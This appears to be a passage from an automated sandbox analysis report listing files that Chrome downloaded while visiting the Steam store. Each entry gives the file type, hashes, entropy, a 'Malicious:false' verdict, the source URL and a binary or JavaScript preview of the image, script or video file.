.$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):130610
        Entropy (8bit):7.989046720157814
        Encrypted:false
        SSDEEP:3072:gxaiKmxK7g751R92E1pl0votkj2YB08gCyA:LVM5PzZyB08tyA
        MD5:20B1BBF1DB3478B01E783A7EFFCAAA09
        SHA1:7BBC1618ADBB4144C71EB9873163D6FC8EA8158D
        SHA-256:2A98F6E1A4129A46F402503BC75658EA6C267DF7EF96E6CAFBAFC91BCDCAD94C
        SHA-512:AA63A16F5BFB5F4E2092E1325BA54B289235382C647E70B80AA001E59C7D3D0C4EE8B8F1CFC12AA1B60ED40331810ACC3A65369B28459725BFA4FC0B53DAD3F2
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/categories/homepageimage/category/fighting_martial_arts?cc=us&l=english
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx..w.e.u....9.=....H..W....... ..f..Z...g4KZZ...Y..5.[..L....$E. @.(...|UVeV...7..3...""...jeE.{/nD.{.......#^{.....y....gfx.Z.s..p.V.~w.'..H..$...8..!D..... $.q..@ p.s8.!1..5.......?:......@H.B....w..BH...!..!....k..)|.."pNP*.I..8MPJ!.().|..).._J.@..#g..'.$R.......e.w[........H..........C.... ..@..U.r...y.5....;... ....3.2O.h.....0=9..j.,.82_'.2..\...,.........i..p..... Kz.6..u~.....G...m...u.:./..IY.<.)jQ...dz..A.....-b.S.$.p..'...R._...'...O...<..m.?.q.xd..Mn...O>Hc....?g...Y.K...d:#M5.X..X....8..A.{..k..2...9.u...B.C.......P. ...6..*d~o..7.......?.s.<?.z....../...|.'.....>=..S.;.D.%...a.p...*...\....~.TgH.@.X.7..G~K.G..}].k?../......~J.9.........q.\...c.9...k.....?...id.L.i..pB..gu.A.<.....I.....C....... ...+F'KP...U..X0....i......<...$Q....G.>.......}.Q.....b.....Y..Y...%..!0L.K.ju.'.B.Px2..!...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):89813
        Entropy (8bit):5.308100509577678
        Encrypted:false
        SSDEEP:1536:imsvf3ZcGj0CqB26gdz5a70sfFo1KnVn6z4EBYfhlOPBr90w6ssOZrQSysmHN4jU:K046g+Dn6z4EBBlWN4A
        MD5:BE7A80DDEDA5A3054D1FE2FD5F9BE38D
        SHA1:787AA520CCD0D0DC27708D2B3D88353B515E540B
        SHA-256:6FAA32DC8D73575FBC964B7F77E0AE25A835731A5347FE26F2203DB19786C1F7
        SHA-512:E4581024B127FAE124A1E93A6230DC8C658049D0A566ADE67D15199961575968E83029282956849F1DE4BA60123AF59067EADABF9D4FFC3BF280C6C760F35AE0
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/dynamicstore.js?v=vnqA3e2lowVN&l=english
        Preview:..function GetElemSNR( $Elem )..{...var snr = $Elem.data( 'snr' );...if ( typeof snr != 'undefined' )...{....return snr;...}.....// look for links with snr parameter...var links = $Elem.is( 'a' ) ? $Elem : $Elem.find( 'a' );...snr = null;...for ( var i = 0; i < links.length; ++i )...{....var link = links[i];....var navinfo = link.href.match( /[\?&]snr=([a-zA-Z0-9\-\_ ]+)/ );....if ( navinfo )....{.....snr = navinfo[1];.....break;....}...}.....$Elem.data( 'snr', snr );...return snr;..}....// given an array of impressions as strings, this will handle joining them all together into a singular string, but enforcing that it doesn't..// go above the cookie size limit which can otherwise cause users to become stuck since the page requests will start failing..function JoinImpressionsUpToLimit( rgImpressions )..{...//cookies generally can go up to 4k bytes, but we can have problems when we start getting that close, so cut it off earlier...var nRemainingLen = 3200;...var result = '';...for ( var
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):3337
        Entropy (8bit):7.892760651819877
        Encrypted:false
        SSDEEP:96:KSDZ/I09Da01l+gmkyTt6Hk8nToHyr0Ds:KSDS0tKg9E05TYQ
        MD5:CA87E695F53CD686A507EB1E356C2A3D
        SHA1:190F4E4D353612A7751F03ADB7D977A12BDDF9A6
        SHA-256:58A1BA330EBDE58FA377C56C13E1DC15EAEA26297BE56646AB67E647968F04A5
        SHA-512:293F1F514F3794815E9F73520A122778628524E5BAC53DB5D2D3C932BD9985BA4BCEECD0D4ABFB521EB7D7629447FBF8C48B931F997E66DBF8977FB0419452A0
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/ico/ico_achievements.png
        Preview:.PNG........IHDR...4... .....]?[f....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 27 x 21, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1283
        Entropy (8bit):6.804522396238829
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVgy28yULyJ3Vey7uytbGKIg2NXxqa37SV:IwqQNn2xDWLJ3xXJKg2NXjK
        MD5:6FD845DB37342E49CAF9A1B3D1268EA4
        SHA1:E380BB0F718887BA15FA5A62E06C368F39095660
        SHA-256:2B5E58C85345DCB11D869C8033CA7B7EB00A15C73554A59B553045BDE1A94ABD
        SHA-512:83DBC8420F91AB206D66981D6763017169927E68545629BC22C1265A773546196A2EA67F91F95D6C0EB7035E689D4581A8BA3B3A3AC797D2AE6CA8A237BB51A6
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...............%....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D0D315BC12A911E49EBED2AEC7E84312" xmpMM:DocumentID="xmp.did:D0D315BD12A911E49EBED2AEC7E84312"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0D315BA12A911E49EBED2AEC7E84312" stRef:documentID="xmp.did:D0D315BB12A911E49EBED2AEC7E84312"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......wIDATx...J.0..3...Z<..9....>......^[.=...>.{P..F/...i.5~Y'K(Im]....L3.d&)I)...|8.....B.`p..I..1>.......=.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65371), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):1192844
        Entropy (8bit):5.351959541652995
        Encrypted:false
        SSDEEP:12288:vLQVfUTLFru30N4Hgf2je6NEjPoPNe3ejSF2l:vLQV6r+0T+eDopb
        MD5:8B0E33CB4696159D328146888EEF2681
        SHA1:0647C26511303F5C1B99876561B9ED00FFA5F565
        SHA-256:CBE47542B8E8077194D25B37C73509BBD09592CC667C11D2A4B2581C0ED6F6FB
        SHA-512:07050033F7DB4F82A13ABC631E8B86D31361FD65FB7FA91CA06DABDEF740A7EB307A9C534899130148CB9D08C3AD874D3F0EDC488041D379F6A3ED40F551659A
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/libraries~b28b7af69.js?v=iw4zy0aWFZ0y&l=russian&_cdn=cloudflare
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[3250],{80751:(e,t,r)=>{e.exports=r(19862)},24291:(e,t,r)=>{"use strict";var i=r(86435),n=r(36551),a=r(57675),s=r(35597),o=r(3951),l=r(9452),u=r(11197),c=r(34399),d=r(76e3),g=r(6123),m=r(91586);e.exports=function(e){return new Promise((function(t,r){var p,f=e.data,y=e.headers,h=e.responseType;function b(){e.cancelToken&&e.cancelToken.unsubscribe(p),e.signal&&e.signal.removeEventListener("abort",p)}i.isFormData(f)&&i.isStandardBrowserEnv()&&delete y["Content-Type"];var _=new XMLHttpRequest;if(e.auth){var B=e.auth.username||"",w=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";y.Authorization="Basic "+btoa(B+":"+w)}var S=o(e.baseURL,e.url);function v(){if(_){var i="getAllResponseHeaders"in _?l(_.getAllResponseHeaders()):null,a={data:h&&"text"!==h&&"json
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):2213
        Entropy (8bit):7.7266121754497386
        Encrypted:false
        SSDEEP:48:vcGVkMDZ0sG7WhI1kgIAmZgq4alYhDpgeDsl:vcPYNkfxmqguc
        MD5:5940289CF8566F48AF2A0AC6EDE5E80C
        SHA1:27E621BE456AA213469C909E5B63B976FE6BC834
        SHA-256:8AE51EE090A52AE5B3A5BD8AF48958121F09D554263EDA99F4D9D6C638FDEE02
        SHA-512:61F57E2E245E685FCE88095A0648408FFB1FACAE84574FACAFAA40FCE182851A3527972320130401DDC972A70C70D7DC485442F67AACBEC31BF75192CBDC6F99
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_3363565d8d2dfce0f654abfc1c28dcb556b05c85.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................8........................!..1A.Qa."q....#B..2Rr...345................................ .....................!1..AQ2.a............?..o..cP...}E."..&,.....[#%.7e`C..4..<.s.Q.).M$:....=.I..''.&.I....tP:.0.......G...=.b..I...2].)\.=..}.t.+...<;.Q....(d...r.t.|..y...1w..;.b..M......a.I.>"....p.<...i..+...XX....4..3.?.@h.- p.R..@.]...j....`.K.f.P....X..Zu....M.F#...6..S......c;.L$...L.R7..a0i.......)p...7..+f%>...B{w/.>=] .mo....C%..,...@.UN...t.\.Y..V3..Y....X}..6.W.h..QB.!.r........NsO.9.-.Q......($....=..V.G.;kl`....i.$......N.<A..S4~N.h.......m....byB.lt...Q`.\A...e..s+.`;..F3T.w..1...!....A..G#qE...Z]/.....Z9.b....S...Y7.U...;)....U..l.d.F8......5...?..ic.)...I.ItX$aq..1',zl..d...FZ...-e...I/Lhd).m.1.........5."..Y...".r.J....}*p.c.Ym.....,p...;.b..+Y.j.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.998687800508463
        Encrypted:true
        SSDEEP:24576:rTO4bPcT+4J7BehJ44DGhn8OGL0deiSdd:rTpPiVkCRhGxiS3
        MD5:A1E83F19DDCD3C91583D7A524764CAED
        SHA1:481D852281188722C7B7B0E652DC3E2308F5B4C9
        SHA-256:FD464933763E1DE241849F8F84530AF33D1C4D9F5AA3FBE65E2E27D786BACBE0
        SHA-512:9911A77E1B0E7333A2906938B579D229C6DF290B5093CF781D0C5EA02FB5C0929E0321126DDE07FA7932334403EF4C84008D235EC3A0494B1F3CC74974A74960
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:4
        Preview:b...&....6..^.'..,V.........K.[......8.E..r..e_.9s...A.N..?HmdY...J..2.'Wj...I..% p1.@.c..z.,.*.0.M!>.....X.....3...S.....Q.3.;Y.>A)^...f@~...,.6/.Kz...o..0N..Q2..\.j.Z.N..9...=,.+..8..:.m<....dT$Q.=.5.u+..".a.y...ZS.l.2{..l.....9......Xv.j>.9....$...F.I...|...i.`..Z ..Y-u.j..K.>.4.'.....v...4.......;.tE.)....Nc$.]..Gr..=.L.A..Q.:.;...s..,..(..W.;.-e.Tw..O..R.I..h...+.........+..=....O ....s..,..2|.~...MZ#...c.. ..D..7.+........O...F....wkPQ.m..<I.u.O.O....:.c1 ...y.1.p..`Q..xI-".w./..8..d..Z...=.]."......n.mc..5..D.v9.O.ek..P.a....,_1E..I.....K....y.-D..1.O.>wo.Yf.:l../..D;.....}}}.q..!.W.O....(/3.=l..a.^g...l.z5k........^..3.:.1^.?.0#.o.0.M.Ja.n0.....e.Y..:{....b5g=../...V...P.......A.....;T|.zkc...E.>....\...WP.~q6.{.................D.1.f.iT../"..&....bE...BB.cm.*.0K.x....=atD...^]j'.Z..2.*F....E....G{..S..<.K..^P......5...>3...Mq...5d...e....#%.f"..i.p.....Ffjw.......F..E...(.HW:.3UBMY...W.N1....G....25.R..:......W.t.P..tG...k...`".+4m...9
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 118x118, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):51961
        Entropy (8bit):7.977517962203987
        Encrypted:false
        SSDEEP:1536:PfTnziLO5cC4D21Hw4WMY1YDdaSIsp8r+f:Te44+Hfb8SDp8r+f
        MD5:0089641E8BD3076B93F5AD4C555291DF
        SHA1:36CFB6C6609307659C120D80DA8C0BCBD7DC377D
        SHA-256:4A0B2814FBC3C4C6E585E0F7105C2CA24D75B5C39DD954AADAA52EEA56305E93
        SHA-512:AA311D20F834A778FC3D39733BD4C176E140D1530942CF455EE74518718EC9647D958822E42E5F0D252B2C226DDB9AC71318B279AEB6375BBEFE447C8084F194
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1124180/header_alt_assets_9.jpg?t=1716189787
        Preview:......JFIF.....v.v.....C....................................................................C.......................................................................................................................u............................!.1A.."Qaq#2......BR.....$3FVbrtv......'48S....%69CTcds...........&5DEUWw....()7Gefu.....................................N........................!.1AQ..aq......."R......#2BS.34Cbrs....$%5.6DTc....&............?./.w.Ww.[.H...=.tI..N[.&.R......a...u.......=..ur=.k.l..[E.kNy....a.68......7*..Rw/..j}.O....hp_......KW.7..l<.[...>.'...48/....q..Z.A...?e/s?[...$._J...~.^.{.|......<...?S...$._J...~.^.{..RUz...Y.T.....S.../...0_...../..^.z.z.yS.0~.-O.I.......z..".GU.7..g..g.b...........g...:.A...a.P.......+..?......g....W...........S.../.|.../[=._(.......*......_.....~.^.{.|......O.Os.-{L...+..?......g....ooz2.3s\.m{P{C../....~.^.{.|...[.._..t..Z.X..`..}..?....l..|...[...Q7\..h.x..}......Q/[=._(*}....j_..t.'.E.j4.PbN...G...?O/[=..?T~.{
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):81169
        Entropy (8bit):7.978776274967163
        Encrypted:false
        SSDEEP:1536:ab1gV9JR3AQSRvC/j/YDF+BiREVriUyOiYI1aqk/XCBJvhw4yi:ahW9J2Qmoj/YcBSEVriUyHvBxyi
        MD5:70191EA54BC5F7B92E8D4F8B86B21D0A
        SHA1:B6577694CD94F95DC6EC7EFE6A6D588E8B3DCBAC
        SHA-256:2FB86A62E78258A7BF5B43B96D08C4E7F0C139EE403CFD2194610679A5C21C2A
        SHA-512:15172831895406087F858E8B195014483CB1D85A95FAFD80BC758F62E6D5C963FB8201FC8CE5E3DB5ABC677F0FA25927F9D37573116748903BE7BF0CD1D15793
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2215430/ss_bd593bab36968778b95ed4a1a12ec82d2350d351.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................R..........................!1..AQa.."2q.B...#R...3r..$45Cb.s.....Sc...7Dt...&6...................................=........................!1A.."Q.2aqB....#R..3...$C.4.5SbDr.............?..,..1(.o.c..........Y........pg.d.p3m.....G.Qq<.9....F..N.tf.......&IFF.......1.> ..5........}..e.C.-.i..I0...B.........VP.N.`.......s....RB.y.t5.&.$..9..J..cQ.../.t.).......#G..Fj3......B..|A...1..[*l....P...co.....q.......|.py;c.{>.p.3tK.E.....G.U.(E...;28.}M..Z...4]y%......4.#m,.s...0..gv~gv..Oi.Rd@.Z..0....|ED.hw.p.p...)\.L...f......!wI.)..R..[.d.Y.....9...V..\..e..ii..nW.7......x.#.=q,.&....\m.rii.|....g.3.5J..p.b.(..R.e.I....Y,.nQ.l..y..J.m*...<.-.P,91.j.l"..v..8....lu.....@..2.O....^}1u......oj.h...L.l..viM....U.)...C[. .'N}2.Ds..9.....;..?:..n..iv.Q!.\.....){
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (4111), with CRLF line terminators
        Category:downloaded
        Size (bytes):90600
        Entropy (8bit):5.649804650236664
        Encrypted:false
        SSDEEP:1536:ERD3AFtIzZw8T2rRiSjj3fhyzSblB3K5phtdBc77LyxHk/QaQuZRFd7TnEVqhNjI:Eww2kSjczSbjK5phtdK74HGQaRT7TEVV
        MD5:87018B6472756FC26F64B02277A21AD6
        SHA1:FAB380928C50AB3233A9983BCEF8ADB46637EF78
        SHA-256:D0702E7619A9A7D6399EACC5358C9D50B7E8FBE3F2C93257C147CC726885A9D6
        SHA-512:FDF70B4C8186C8706BEBB07C7CECDC6E4E7E97EA0DCA1289EAA414C6E1C8EF76B09346C6F39419B75A2DE123ED379C0AFC68F2F9361625D58B1ED1B082C382CD
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/game.js?v=hwGLZHJ1b8Jv&l=russian&_cdn=cloudflare
        Preview:"use strict";......function ShowEmbedWidget( )..{...$J('#widget_create').show();...$J('#widget_finished').hide();.....var $Content = $J('#EmbedModal');...$Content.detach();...$Content.show();.....var deferred = new jQuery.Deferred();...var fnOK = function() { deferred.resolve(); };.....var Modal = _BuildDialog( "\u0421\u043e\u0437\u0434\u0430\u0442\u044c \u0432\u0438\u0434\u0436\u0435\u0442 \u0434\u043b\u044f \u0432\u0441\u0442\u0430\u0432\u043a\u0438 \u043d\u0430 \u0441\u0430\u0439\u0442", $Content, [], fnOK, {} );...deferred.always( function() { Modal.Dismiss(); } );...Modal.Show();.....// attach the deferred's events to the modal...deferred.promise( Modal );.....Modal.always(....function() {.....// save it away again for later.....$Content.hide();.....$J(document.body).append( $Content );....}...);..}....function ShowShareDialog( )..{...var $Content = $J('#ShareModal');...$Content.detach();...$Content.show();.....ShowAlertDialog( "\u041f\u043e\u0434\u0435\u043b\u0438\u0442\u044c\u04
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):251253
        Entropy (8bit):7.985928431865218
        Encrypted:false
        SSDEEP:6144:F27opfjhTOfoDlPEyKBPP5dae3arz0yMPovDlSMo:F20fjaClaFP/5qrz0ycovDlSB
        MD5:A40888F6745168D850589417F6DBD3E8
        SHA1:AF59BCD3CBC35017D07A66A02CB1B96C7DE29644
        SHA-256:94462DE24EE7091411887A7B5BE4A8F653C5615EA27D8B998707372D623FDF1D
        SHA-512:101EC5277F11F069086DBF1402F163DB0578C5B68BD878588C7E79EFAD8F07824AD9F2C6958A1BF07D13D36AAFD5F2170ED76BBE414C6233D1D7450C2CDC11E3
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:25:17+03:00" xmp:ModifyDate="2021-08-03T14:25:17+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:6382e799-92d8-e242-bad7-e23b8fe89675" xmpMM:DocumentID="adobe:docid:photoshop:76e094fa-022a-8342-884b-35de2b365b25" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 600 x 337
        Category:downloaded
        Size (bytes):717
        Entropy (8bit):7.53474088967301
        Encrypted:false
        SSDEEP:12:Gsa1HWFSEyPb4436AIpOJg8GTn3STvC4rvpydlr0cJ+VuJsz+GNdYBE:GsDAPcVAIQJNGMgJJYM0dYBE
        MD5:123FB3CE825CAC7A073DBFE0C9700CF8
        SHA1:95382BF6B587DE98339BC7D75777E3B70AA38290
        SHA-256:A34021A5F4D5E668E763AF8873360589E094392D6E0376B334777410BED88F3D
        SHA-512:ECC43519080870EBFE975865BB3011AEE15592A69144066322FDAEB2F562A007DBC36C5B1BCBD8DF63015C355CBE9B0CE4ABBCC0282FD6695E4A92C7657D894E
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/game/game_highlight_image_spacer.gif
        Preview:GIF89aX.Q..........!.......,....X.Q....................H........L..............L*.....J.....j..........N....................(8HXhx..........)9IYiy..........*:JZjz..........+;K[k{..........,<L\l|..........-=M]m}...........>N^n~........../?O_o..........0......<.0....:|.1...+Z..1....;z..2..$K.<.2..,[.|.3..4k..3..<{...4..D..=.4..L.:}.5..T.Z..5..\.z..6..d.=.6..l.}.7..t...7..|....8......>.8....;~.9...+[..9...;{..:...K.>.:...[.~.;...k..;...{...<.....?.<....;..=....[..=....{..>.....?.>.......?.......?.........`...H`....`....`..>.a..NHa..^.a..n.a..~.b.".Hb.&..b.*..b....c.2.Hc.6.c.:..c.>..d.B.Id.F..d.J..d.N>.e.RNIe.V^.e.Zn.e.^~.f.b.If.f..f.j..f.n..g.r.Ig.v.g.z..g.~.)Q..;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):49766
        Entropy (8bit):7.983233054891611
        Encrypted:false
        SSDEEP:768:3GfwAtdzB4G52hSHzVKDs+ndVIUc1W2cCSPH7kLSQLowr3JtBBaEbdn7R:QzB4G5gSHcDxIb15cCKH7Rvwr3J44dnd
        MD5:E1F4757EF8272E743BBA55FF11290942
        SHA1:16847B75A0A23E5FF8B008D9A37DE2B6264631BE
        SHA-256:E850B2989DAAF381D713A962756B47BE320F7CDF7644F2C03003B83AF02D88C4
        SHA-512:F795640C2BE8FA8A92BC084D7B4A00A004414177D3AEAC81A7759B191699FD5D502AB3D3DBE45DCAD5FD38C71074F8303107197745886ACA599C06B070B16F8C
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1142710/header_alt_assets_3.jpg?t=1716536507
        Preview:......JFIF.....H.H.....C....................................................................C......................................................................................................................S..........................!1A..Qa."q.2....#BR..3..$br....7C...Su.%&48D......FVt....................................I.......................!.1.AQ.."aq2..........#Br.......35RT.4bs.6S$D...............?..C\...Z.....r.K...Z..B./.m..L..#R.n{\.O......$.&e...6./.8.....$.;....v.g..n.a.5B.mk.=q]...FwHj.......V..*.../K......U1.+^..'JV........jzt.1.T2..x...@.. .;E..50.......Ka.....f.T...;...~.S..O4.8....D.....nnN+=..1...._.......p.......>.yJ_US.\...?..0..%.+m[......`Z.....7...G...`.0.hK1.A.....t.#.np1(.1J.%..8..fV.,/.D.F............Q..1\.B...Glr5..^....M....ei..d...Y..,HM.5..X.A./.`..{..v..J..^...@I...O.-b.T.O..Q......;n.....Q..v.L...../#Z.._..H.9y{....w.l.*c..!..6s.../.S....f.s..G..).s..5...L...3......J...)U..{...........)..%l....c....t.mM"....bv..-a.A..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 306x260, components 3
        Category:dropped
        Size (bytes):41851
        Entropy (8bit):7.980235903458787
        Encrypted:false
        SSDEEP:768:1cjZjGRitrtevIH5TOkY7b5omxzbaQPCylmQ6VEoVE0Xo/KIFLe+1U:y9jG0tEvIHWvUQPCylmJhVE0SKkv1U
        MD5:95EDC15685A6B8159DC3920D893831A7
        SHA1:6D3C91EE3FC8E8A5B64184EE309752E38DE7FEB4
        SHA-256:933A0BB5354C46F2EED6E90BE91BC98A89DD66D437AD483EA93F6A40051A68FB
        SHA-512:BAE48ED7D171BA16F18A046FCB02E6EA2F0E85EDEE75D2FCC83568883CA8FC3C68E58E9CD29520F3C2353F2445C2DB27235F8097D9DC63431C566D573458BF68
        Malicious:false
        Reputation:low
        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:EA415E2BAEA1DF11A752BC80D643D9CD" xmpMM:DocumentID="xmp.did:E049E34F185E11EF870C9CB628AC2594" xmpMM:InstanceID="xmp.iid:E049E34E185E11EF870C9CB628AC2594" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4a7860c1-9d74-964b-9b44-ffa326329aa6" stRef:documentID="adobe:docid:photoshop:21838ae6-7fbd-0a4d-82d2-a5869c55efac"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...............'...<n..e7...y...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):53903
        Entropy (8bit):7.977862972312359
        Encrypted:false
        SSDEEP:1536:BSgZgrJ4ZBa1wsS5lLVRN3onB9R1NqDaJAHWbBrRAeWxB:B3qrJ4GU5nRN3ojRbLAKAjT
        MD5:D31ABE8CE61F7D55567943E732E0B61D
        SHA1:8451C2C87987802B9A83E8B893551DB73BEB3152
        SHA-256:E0670CAC6ADDA0CE2B5A05695FCD161267F2881075C8A8A6F3898F4D7105C903
        SHA-512:9BF2878235069FC9A451E97AC870E424A9C41EC29515AD1A176D48D692B016C2221228184B488B438CEF688DA302CC77A12D27810FF1D5E734413EF4633DB7EB
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................Q.........................!.1.AQ."aq..2....#BR...3.4br..$C..%56Scst....&7...u...................................-......................!.1.A.Q"2.a.q#3B..R..............?..B.._i.w..|.........k..g.rR..M.Z.q.qb.<H.2.%X.^...L^..i.....R.|..$..x..6...h.hq|...G.....E.....s.F;w<..Z.L.Ohqh.r....v...\.t.R...........!<6..<.;..+.D....m..!".V;....+S.0.......`k]Fi.....>jJB-...r"H..s..74.....F....#.~u%..M.....2...C$...L..\.`}..).f$u...!.I........Vm49t.....b.&..prO??Z....../B.^..o..{#G:...9...(8..E.qO..c.u$.{....[.!...W.......y.........;7.iTm....9...Bh.b...N..P.,..(.x..'.~5-.....Y...`.....w+.Bg.%.h........VBDW...Tax.l....$..s..*..uc.;....hB.o.PTl..EP